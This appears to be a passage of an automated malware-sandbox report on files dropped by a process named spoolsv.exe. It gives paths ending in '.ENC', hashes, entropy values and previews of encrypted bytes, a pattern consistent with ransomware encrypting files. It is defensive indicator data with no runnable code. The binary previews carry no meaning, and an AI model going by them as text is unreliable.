                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.85848602971305
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+slfQcnnT9/O2ygPSIiWUqI9STA6+EPb6OhxW7RRB5T4jdxxSCmRyMEw:+sl5T9/yHfW9Nc9EPzhxW7R4XxS3RyMB
                                                                                                                                                                                                                                                      MD5:3541CD5BC9F579E29F8355A3B8E18F3B
                                                                                                                                                                                                                                                      SHA1:0C78AEA96046AD298B48156B8008959A65C2FB90
                                                                                                                                                                                                                                                      SHA-256:421D60678C74239AF34ACED8E94EAB1A7A98AD196036A68680F201627489FEBE
                                                                                                                                                                                                                                                      SHA-512:E0846AD30524E709D1E3E100A012046E25CA05100E03360F271EA94F0B180C3845347DD8E128A4D83CE5D50B072570FEA334F599DFBD7222530BD235A2BF8E95
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....>..,........m..G.._..."s.!./.'...K..4..Vh.3.....da UY.v.......j...F..\@.1.MV-....2P\...;........U.$..-k..E.#.......`..#..$E...E...-.~s?..-..m_?.^).9x.2....x...c..;..J.W..T.T$. .C..j.U.J...)$.|.=.@9Z..0}.........Ha.0q.....!.d..J.....q,m..(bh@#..M.!.k..5-(..A.h.8....k[R....b.C..`2.&..C.I.u[.......V...}.D..bO....<'.$..K.......V...I.....RU.d....A.u..u...+00.0-.&..;Ns..S.<O.....r...{.w)z...S....D....z..~0.+\..i...).....:LG......Qs....%....6.s0..!....S..?..s..C.^.WV.&....U<h......m...._........_f.]...%..'...G....F.......>......+.....z.D.S@.....o)d.....Lh......27)D.b.6..8.(.z.2...O.....RS..........?...].9.HE..R.V.......s.PA..y.8.....-..x.....b..9.>.\.9.....ld..M).J....p.2.kTw..:)..+.ul._.J.e.#X2aI.c.o$P.m).S.I....]P..Ifg.^Vyj.r...5...#X-.... .[..&F..X..?1C.D:.(.df~.....<...........7=kM..Bg...x/...rs.P..T...k..&.....4....._...W...d.Q..0....G.6.Mz._1X...F..4...iNT...^_<..}8a).....i.#...NS.un;.t4.>...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.85685622848317
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+BUiGSp4iFeUf3OiCh1QrJs+H9apatm2huUn6zGO5xySqxg5HJXd87fwVQMoKGeH:+BzDpD0fi8GMpa3A+6KO71qafd8jwVJR
                                                                                                                                                                                                                                                      MD5:9FA4A10A518197E24EFBB6A05439A7D6
                                                                                                                                                                                                                                                      SHA1:BFD11BF9435CB6CC83F943BCAE8950105D48D160
                                                                                                                                                                                                                                                      SHA-256:D2F4B662EA59601FCEF22C5A7854794ECC33BDAAED24FF1E527C0991096415CD
                                                                                                                                                                                                                                                      SHA-512:4BFB9EC364018CD6B8B41F5C6FA798BBB3DDA48F2610B9C006837D6844C15DAD88E6B5BBC86BAF3B155A76C067ACA57A35C5C43907BA15DD934959E8732A170F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F._g1..T.K_.c/./K...G.......UY.l...81.~u.+{G........~.v?-._...../..T.7.[J...c...2.w...:..R......0c.J.....`..%N[$gw...m.]r.Y..........^Y.X....M...Dm~ ..|_..........,/.Y!........r.....1..(..U..<.P.y..C.Gh....A..z.MB[........W.jY..wc.".^;.5..1..B......k#.(r...8b..Q....4 .....W.....9.N..1L...=.fm...;..a.a...C...0.$H..j.%...!:...*.D.9........u:;.n...Q.c.i.......*as?..tRn.o`.>..=...E..O5...)...r......U.L-.^..(.zKOx.W>..V..9-3.H.~-.p.[...b.........k/c..(...L.I..J....N.LqW.R0......pm......`........Eu..4~.^..@$..%.......U.n...!!:-.........M.....4|.,...,R(s._.Zh3.?P.6..S7._..ZL{.4.~-.....v ..zz7.b..."..-.x..[I.Rtwm...m...F$..i.D.....M.#B.B.t..&..5....n.7&k."[.....\..:._9..O.k=:.0I1..R.a..c.5.....^rQV.....$._..%h.sj.VY.x.h..I.dZ<.,|..?..y.pdc.y..US...<7.'F.?b.q,...s......OFq.#.I..D5..f.g..B.wr..G.....%k.....',.b..`..mF."~...?..Zzq..M..@.......g...u.[.F'esa.,..IN..0(z7O>K...2.m..........R&.2g6f'x.5M.4..2....Q

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.863699848709375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+a07oUT8pfoYHSnG0Z6XOgy5U4OXchYYYH0wwCyKvd7jneQyFlnkSSaHwnI:+aAoUApwYynJdgUtYYYUwwCTL8D5SqsI
                                                                                                                                                                                                                                                      MD5:50B5BE0BB77A195FD5ED23AE6192596D
                                                                                                                                                                                                                                                      SHA1:0E30DA1B0DA1B84C0721877AAFC103A15553747E
                                                                                                                                                                                                                                                      SHA-256:A1DF03670A3B5CD9C0245529D6E4B84220B9D69931980FE6188B828F82D4E2DF
                                                                                                                                                                                                                                                      SHA-512:12BAABD88C76F9DA75BA8827318276DBE4842EA11A7EF5057F12D8CCB80B15CE3A69189F9FAA95EED71306DCA2DD3E14D235DD581ABB67FFC18151775B7C7783
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..j.... .E.]f\M..*.`~..%..=..>.X.....'.......wT....k>g..V../......fH...1.........8y...[.........Ekwc..=.A....@N..kK...r.c..a.R.O.$...z.'.lM.+;..|.........;t.].......q.Mo@G....}...aKxQ...|....i}$*>..~.B......._F......M.i$/...jJ".....@9.......B6.....d.....3.Jd.`...Xo.b....2.5.1Dk...ChqV.l.0..@..#.T..m.........=!].i.V...m...4.W.....'..+C.......?...m...s..W.L..O...:...k.^3.<...}...Zb.....I..?.{.$n......v...Km.1..?=..M'......'..Lq.yi;.....r..0...A..i...q...CC.....L.6.W.R.r..(Z....3.... .....aj..Kn8g..!..qH....q....a.5.A.|S.C.g(K.[.'.m..v.".=bhX..et.s.m@L..oCX78\...LZ../..Pi..<{.L.{w..CD...^.M..P.DOHh6.V.7..f.KS..&..l........>P.. ../..*..^.LTL.._..R0f8....d...d.!..h.t........:.Z.........L.`.x.4..3.h.?jD.).9..T1...x...a.x>....\Zu....".2..-........%....h.F..1.....%..........6.}..$l...rd.D..$\(.....*N.....[CR4IyO..]...U..:.A.a.3e..B..F...NB?..1.4..@+/..I...:...C..].'.}.gF....Z..Q..Q.....p...w.`.R..d.P.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.83806342002624
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+cJDAHA61cuwmviDe9qKAo2sZXWm+y3JVHndYbgV5DJRhDxbeH+u8d:+cJDF61cuw+inKAo22XWmj5VH9JdbW+p
                                                                                                                                                                                                                                                      MD5:C4D363A120C70AA1DB67BFEB3D0F1592
                                                                                                                                                                                                                                                      SHA1:599CA4D4C76394A88790292CB2CB9415EF6FD6AD
                                                                                                                                                                                                                                                      SHA-256:405A9CFFD08B43CE11E4C53CF487DC630A70B00394B5E76FD4DFC026E2D88DF8
                                                                                                                                                                                                                                                      SHA-512:D91CB6E2441D45BCAEA5B4C81E0EC89EB1F2190600249E4ED1FCA7787B27374CA1914924D9D1442B2BD2A1A6239DAE9AA512E2B6885139CC99A6E25772DFE593
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.r..+...J2..T.4.cv.Y.d..<.mB5...Y...O.Ce.x.k......:...Ut..C.kJV..,././...1$|d}".5c.$g[]Q.!.sVz.$M....%j...<...Hz..,w...I.Xi~.[..5.~....g..v_y...6...c.*....RI.,...D.!...:;.D]%.M.yx......[.Uf..R.Q?9....H.7...a.#.n..........vCU....&&..J......).O.iQ.V..1..U....}Bp.(.*..p..7..G.6#.7..lq@,q..]Tq.Y..%.F~Op.8@.c.....$...,..]z ............ ....Vsl......G.(.UxS/h.h..$x~......F...FY.......4...^sl...,9.7.i..;....../.V...YY..}d..<.~.k.FU..'..,vnoju..&.veu...VQ..$.:c:.......{..y,^....JD*.t.....3b...%.~..m.........w.....^_0. ..5...R...._L..)3E|<.Sx........B}....[|...,.f.G...o.....^SMT.+v.p....2.A.[.h...>W.>..L....._...3.o=..........>....L.X..O....#....l.E(}.)lNA;i...#&..Q.N]n..ef..X..,...".S.VA.c....S}h.34....~...p..vF.......C...L.,.M..i...G.O.B.X.T....L4w.X...Ko<...p!F<..4sTl.])..o........NC..s.n...D.H...)....c...q...b..p.|..O:.o.%XV7....+.4u...C...vB....8.K.M.3po ....V.u.!.X)..OO......^.e.Y..l..a.w........6...D+..{

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.85410749770825
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+ULYbvvy0elHnNmoRIYaUg3nu0iSqlCF+pJRGvm1UcObOAkJ4JBJt1WSJ5tzMLtQ:+UL4vvW+nuPl0Ap7uCls1449rDnWZxm
                                                                                                                                                                                                                                                      MD5:CD27AF48709CE52402A14775BE92CB37
                                                                                                                                                                                                                                                      SHA1:4DC71F0E78BE894D655EA718705DB40840D49345
                                                                                                                                                                                                                                                      SHA-256:967E597F9404FED9147BAD6867B5234277ADD912F9EE1B628C75B72DC5F0EFB8
                                                                                                                                                                                                                                                      SHA-512:092FFA3542B80D0A1F4E63FAA5637A1F3F229EA417F4EE8746D0E78DFF00A201D9FC1036E057F29B1B089C53B99D4A7A3C3A8A0A6DA8E9136842D3D327C7C93A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..n.6n.....2/..8nNq4.q*JF.6..F.#.J.+k...."....D......*...r...K.)"..=.Ni.~..Im.......1.....3.Yn(....Z..Ry7..+.$.N....C..<........k....*....W.B.I.........B.l?...6N...?v.)...k"g]..3..@M.v.JE.b.N.[......bA..|..<.b..L...{.r...9./...4Q..#.....H.g.]Y;q.V..m...S&.c....\.cK..v.`..a...%...C.p..i.........x.4...^>r"..t.o....q.....5.O..).....y.*...8.....h-*X.*...?.{h....9N.t...."..>....f...|.5&.L..PT..{.;.*...8...3...RQ:7.@._.._.....4Z..J......LiP.`..b...W}.D..8....QC.....TY.cS....H%{j..0Q=N..........J..0S.+.....:r.o..Vam.q...}"?{3h.y..>@.Y......F-..=}u`.I.h4..(...N.)}Z....6.Z..+.......(....4.J|..u.$5.).e...eEHc!..w.x.+6..*...e!].....}...P.)..P.=.."G\.b..L..&P0.,....D.pPcL....S*%....F.....0..7.9(h.Y.V.\,.&.#.L..{..I.i0...L..t..vi.....Q..,.=..J..<..&.k..?...6.$9..........q.4-.oN.s.-4s..I......4...?.F.<.f`...f....*...}2.M@J!..j[......s......._..5{.V...U.....$F.v].z..Ay....[M.).....m}...K1A...c.Z..v.:....p.+.&..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701301v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.845345601994016
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+UvKKFUXMunp0Xlasw546vNz05UvKDoBwbwegdRL79F5LSmt6b+n8mSJcWPqE:+UvFUXM6qlI54c0uiMBregL5Fpt6b+yX
                                                                                                                                                                                                                                                      MD5:05E85F7C550E2B82CBDDAA665ED9DFE9
                                                                                                                                                                                                                                                      SHA1:2CBA0AA2ABA63A9A8D654B060E4E1903B9D4B6D6
                                                                                                                                                                                                                                                      SHA-256:C74218E2BBF0E427BA23060783ECCB99FFF27926B4787BBAC9B57F18C48CD4A9
                                                                                                                                                                                                                                                      SHA-512:0BE728F1DC5FCD36F8DDA87660658289CEC0A10458B8555A017A73923F8862A617010C8983AD8B9FF8FAE3470C4BE788F82421DA31C0FEDD0EC17B66A2712F00
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.1.t..~N....>.X.H....IK..1.=U..:....xH.E.4...g.8RCQ../}.v-N..[...1j.f.mX...F...W.@.(`..g..|.."....d{...v.I..=M...13.i...Z#2.9..r...QS...b.....r.. 4Ow._:.l...#.O.~q..W9..$...`#_.nd..i.5.@_...qT).....b...5qY...n._.........q.4g.-...#9..V.+hnzL...w.a.[..n..B...Fw..K....0...o......OY....rK........j....4....W.mgXL.l..'I.|...F.?1........H_...4.......o).g...u...>..S.....L.V)..b.....4......35..k ...`.3s..C.d...,...*..)..m.@oJB..>..x..x..5a.5V%..q).W..x.........h\.....o..~..l`uJ.B.~...`0......^!.lL.1.L....Q.......u...xobn..aY....X.!X..yF..e.z....m..H...6....=n.........'.p..B..N..Fh.{_s2......@.d.s.h..7Fn|n.>z....h.m.6..r}......Q...s...M(.*....q}-.<...G<...p....FcD.X..v_..NJ.3*.....2Co...B.Z.3...D-N..kF0..._......=5.9_1.I.FS1ed.....!.0.}.t..".d^..w@.........)...6..].kO..@...........n`]7........3....[.7...iX..X\{.....N..9....JT.En..`{..4....j.Y.".69.3...{.?-..{~.T....}..B.......]..[..u.....Tl..A2...~.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701350v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868151339089179
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+CiIo9+6WjVh+b5i06Vyld0dGnLd+8/OET1Dj02ghsBPZHkXN4NC:+W643+bXgwh+8WExDo25BlgQC
                                                                                                                                                                                                                                                      MD5:2F5BBFDA658564600FDBD06CEF60CA59
                                                                                                                                                                                                                                                      SHA1:67530B005F41E618D9E6B2F351827FBC5DB7B34B
                                                                                                                                                                                                                                                      SHA-256:ADE2CA50157E0E371D62220EA1FC97A7418D983A2919F9FD5ADC307535430DA0
                                                                                                                                                                                                                                                      SHA-512:CC67464FA21D04B3BB73F1FAFB84368FEDD7E6CE46D135EAAE0CA9B2F21D84BCD334E6529BCA2E590A0D65A7DCA94F4399A4A158E4CA817C70C8E4ED4FA62807
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......V...m..g..D.m`......:.f...p.....k<.a..M.......}.RC...)N+P~......76......G.z.w.....#S....b_..Y8B..y...dR..S..!/..z.{.....Z|.i....?ly.".....J.5.*.s...i.\.\..M...X.S.`.wCh1...aD..|.j..j.x.u..).Ua._.D..v..&./.*..B,t..x..St...........g.... ....d..'A@.k....N.."W..z.B......!.....$..B.?..e..2.A....M..(+....E."Qc...;..I..{...].Y...c0~{../..b.....{.e.6).........9.Qi.H>.p.l#.....B.s@.6...7.i..$.wKu...p.}..v.].b..2.....}hr.-..Q..d.......B.h.q.W....e.....p....x3y.)Bs{vd..&.XD{.^..s......~...8...?.Lm'..4.w.......@^ .._...j*..)>.... ..f...#-r[u|..x%.!y...t...i.[4t...{.b.L..0#....@.Y9.g.t ......[.H.(.!....W.u.#B..tLoe-.$.-r...n.Z.J>...-...."s2..>../..H_.p_b.24..:......za[9.$......1.D...d7L.%.... `.h..*@".p......&...Nt.jfz.g.Z....../.Bv&...!.-....*.f.....l.t.MW...j...X7.)X.....r.r.>...2i..&.._.c.|..??.*S.\] K...e.I..M....K..E.2c~..V..LY..3..M.w..S.ny1J].....t....\7u.B......+..@Y.k.@..r.!d.r."...8...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701351v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8761882405521115
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Umi5iKLNICEAUlOylsaS0L9Com6Bel43PhEjH/xgTvkLa57mAvZWL:+UmfKZxjasaSf5H/CLkLm7Ds
                                                                                                                                                                                                                                                      MD5:A6C5EC545D6EE50CA95EB37927BB8068
                                                                                                                                                                                                                                                      SHA1:7AF81D6FC264898FF92ACD46182AA01F8CAFC2B2
                                                                                                                                                                                                                                                      SHA-256:A16DFC0AFCA422D4E19905FEE210277548B963BB0D6BC4153ABBEDF14CCC660D
                                                                                                                                                                                                                                                      SHA-512:63B496DC6913D3AF16E5D739C178A9BE984B9FA9F4DC958981B5D6AF7757BAD31932DB8199293CE7BB404298B22F779867A5339C7A9D3EDE021162B457A0E018
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..,rt..|.^.].6_.....%.'..zW..X..K.....K /\.VaI.......G....v..$....A>..MB[....H .|.i....Y.%.......^>=.*.@..~.8#...+......j}..B..?.+.. ..&l.%......N....n..I......0WI>+7.{..v.uB.n.r.lB...E.>.r...\.....Rp.....8d..f...hCcz..a..S;..8o.>.7..\Aod.P'..tW...w._..a..r....Z..K..E...D@.|.0<...)..R.p...2...[S..&..j..E..}.x.sq.OP.T,'.:.6.c^U.!..U..2)..J/"...C.....F..V.>d....g.V.bV....pQ%...Q.TwFn86...k...{G,.'....g..1:.....\.L..[..@..}.W.?I.Rk.Q...j.h........B.8.3...}...W....U..zx.v.\d.[.v.|..K ...%6........{."....5.S..0....E.0........T4C..9*M..=+.l."..>....?..#[.......]..'...4Wo./.o. ..t3bu..."...m...Qq=.6.t. #..bL0>P.J.!\.n./..H.D.I...F...Y.a...Zn..os.d.th..><.q.>cw.....iL.c$3..].<.....gW..+.T.....8}-2f8.c..'*...\...8.......|..u...]Dm.`..a7...?-|...z..m........hRe....e+i{.y..e.1z...... `.>i0(E-.......Qc...L......3./.C..b... }.7..;..o)Otj^.;...'3..P%.l..PZ$xP.}.`ZJ....*8.F.D.u.YBJs....T]...i....%s,

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701400v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.867801042734706
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Ez8ZKzuoP7/0H5azik76/8Kw0vfKycmcLlsbznOsVeR5yumpuxTlL5ySgi:+EzWKqoTsZeT7E8Kw2KfQHGc7pu7si
                                                                                                                                                                                                                                                      MD5:9DB99EF0758EF8A62F26D7E316C7367A
                                                                                                                                                                                                                                                      SHA1:43DF10A1D05F332C1A5FD37FA9327585273E4F43
                                                                                                                                                                                                                                                      SHA-256:CC3F1D15098E415BF5D3BC65DE83507238F4795A1A928878D54807FA4A2E3AAC
                                                                                                                                                                                                                                                      SHA-512:CC7799421A7EDDB81F366F675236512BC46DB8BB9747A84F5FEA4333F31D67576DDA5A7E847D736247A36EE95BD90CC54380D632FC879D35DE8D845BEE42CD41
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.."..n.P....\..c'.P3.6.......}JR.s..0.._.......K..k.Q..MLy.L.......(V...O(cl..u-..E&.h,......)u....|.B..'..ZD.O...p.F...Y..n...lS.5B...rNu...m.q3..3..q6.,...F...Y.8......:CH.&$\Y...1-.;1....w.t.Hg.<..H....(.GU.J.^n..Cs.+...i...ab@.S..9.....v4.X.....i...T.......F.t....W:.L"..@?...."o.......(..[.a...5.....=.E....1.z.C........4....*{.2+.SR8....'.k....A..O.T..{2.../..c"..}V,7G...=.ubP:FtqF.[..p$)7.A.n.1.....x.(.6` .b.|#1.K.y.z&...M.j...}.~....8AY..H\..4.jX...f.3?rVKf...-..U...LQ..g:5...M....QF".\...5.z........u..s....+..R.....L[....J...........h.6/......6.4.x..&.K.bbSj.J1z_d.+.Z&-r.H.}.Y*Te.....7......ow._.~N..jM..O-.%Iq..K...^.?D@k.C..O9.....).z..m..[.C..1.{...<..D..c..6.-]..Tu.p...l.~#G.....o}...2 Dp<]$X..7...h.J....q..'?y._....F.=afFp...gCB.W.N...ko=.;................z...?...bQ...4.8g9.0....M..S.uW.Q4[x.z.Ey......x.i5x.M".-bYK})./...3....7.o.2.......OG...m...OA,jf...>.R..)Mw3.i...\..j.9..XSH`?.f..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701401v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.856055729103776
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+oEkG86QjQiguwvjAhuhV/VNMGbfeA9gpRVodVlF5kLWAqTyoj/AEp9KHmaZr2yj:+hyjQihwrAhuhVJVvFXAqTbj/R8Hmai2
                                                                                                                                                                                                                                                      MD5:D8E99F603B5244611E45B47C12C7EB57
                                                                                                                                                                                                                                                      SHA1:6C8CF2EA926838E1592C520D82A86CA5EFB8F6CC
                                                                                                                                                                                                                                                      SHA-256:441F9C610E5C3F7481099F48C7E3B2D561BD03C2283BFB4548CD3FFE12084A1E
                                                                                                                                                                                                                                                      SHA-512:2B105AF7A9771027F95CC05BB6602056543A07B3B1B0CD0863F50FE391DD23C20B494BC4E1570F69589FE7A34B99982EE89217E09815307A226606D74D12CAAE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.^.W).."...s..#...>.pJ.%.|S....5,!....V....4rn.0"hH...U.Jkq..L.../.d..T.16+E.28p.O..!..9..e..U..M.|1}&..-M.8..I......<W$.........5;..@...g...{}f_..f...../....=q.v/~=....W...H.W.Ap..F.......t.?{..$....G..C.R.(...w..|..I:....j."{.._..|..3......x.....:.|.|.....>........](..Y..~.T.6...v....q. ..X....6.;..BS{z.....Qz......Q4.....<..|...>.[..k-..P.m/......R..t....i...$a..eK.2CK;6[./j'X..)-G.z..J....7.m.>.(.5@~...u.-Bf..n...9`.[..........63.j}...0s...j..q.S.m...E.......}t.^.z...!Yk....r.....%J6.M.57.K....`...Tp..|..[..*..ta.......Lp.{,...Z..ff.g.......n.T.3.H.pc..g..>.VwEq>...y...\...f......Y.~..........m.C...[..P...$.t}.}.@.N-.d...k...^....'.....k.0...{K.$.O.d...)yPO..\.(.$F.3..w.{..X..Z..LZ..)....5......:...\..o .w=Z..77...a..c........ .&.s.B..?$x^ .......k..yl(..k\o.GjA.$....S..:V......9L..6.++......}..#.Z...[....=..K...e......,.Ep.:U......fn\'*..0[F..P....?~....O.....}O..../8....+.o..........Ao...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701500v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.852700438865173
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+RvI0JCq46nTwlpqffSvh6O6LRvL/t6wNNq/8arDioaJ3MGd4p4KvRWRc+zp8fFZ:+5II4HM3S56OsRzlbf5l3dC4KvIRcZff
                                                                                                                                                                                                                                                      MD5:3D74A4AB1E39A65827B667A84A67EEB2
                                                                                                                                                                                                                                                      SHA1:84C1D3999D42E2C5D207E1A9729EE9617E66B1CC
                                                                                                                                                                                                                                                      SHA-256:9423201C7E6567BFDF6AE8BC6742C6226A907D21C70347893E41FD64FAFFD9C5
                                                                                                                                                                                                                                                      SHA-512:2ED32ADAA6E61143C090C30C834A16EE34B29E4A7C95448F5E976152F814CB0358990BBE266FE9CF506516DBA0C84C01B1B7EB2BC6274815B457E17877803374
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.f...Ng.P7..E,..B...Gto............._|..s...q.\...W2....=$......2.Ab..v.B.E:...2pJ...Yc..../.@....w..a...J....z...f._./.H.&....4...Q>V...<L^.a..n.E...W....sG.v.0Z_..8.......9..I...CmO.3$.,.|.....p.....d`.a2..U.j.....Gk.g..L.......%.2...[\.U.".....W5.{[Y."9...r....H.....:0...CJC..^<.D...u9b.zH_.@.7.7.....I.L!..o..|.;"..U.p.tY......).X6o..F.M......*}.C....4.......K2Wjmm..k.D.*a;..T.:..V..# n@@........%w.b...#..Q...]D....~.............!.(....1..<S..a.ezO..YBg.6..X...D..c/..N.=+}.8..f.tJ#...........>.?.g..;\.}..I.B#...#C........r'M].......P.F3.7...u`.a.........~ZF.hI....{!".........C.b.h8..kY...&^...^8...3V..H....c.._...J......g......X.N..}..1....].]..Sv..Heg...}O..2I./...c..../.m.M.M.....TaT.^.5....k@.jw..-...H...d...e1..g...s.$.Y.......bW^~..9. g......1#!C..../B#5.#D .nS.....>q.I.z....n.=V....$".<C*o.^os..........Zk......L..r.......Sk...... ...U#.Y.pt.x.<.m.=....[.F.....j..BsZc...o..e.Hq,pL4..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701501v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.87969265625611
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+g8MzgdDwYz/Mt+8QcC9DYtMq4ha1WRUcP2XtKtIs6czNbdEfLb/gyQE7bEzST:+g82qwYXpyx1WiS2YuKbd+b/gyQEt
                                                                                                                                                                                                                                                      MD5:D6D1602E9E64F7D880707775D3690ACA
                                                                                                                                                                                                                                                      SHA1:394B0A5D6C817D98C1654E6A2106F0033982395D
                                                                                                                                                                                                                                                      SHA-256:216CE8EB44E68089BEE1BF0FD84C824CED42B3B0D55B4DD03B1495718FC0F5E5
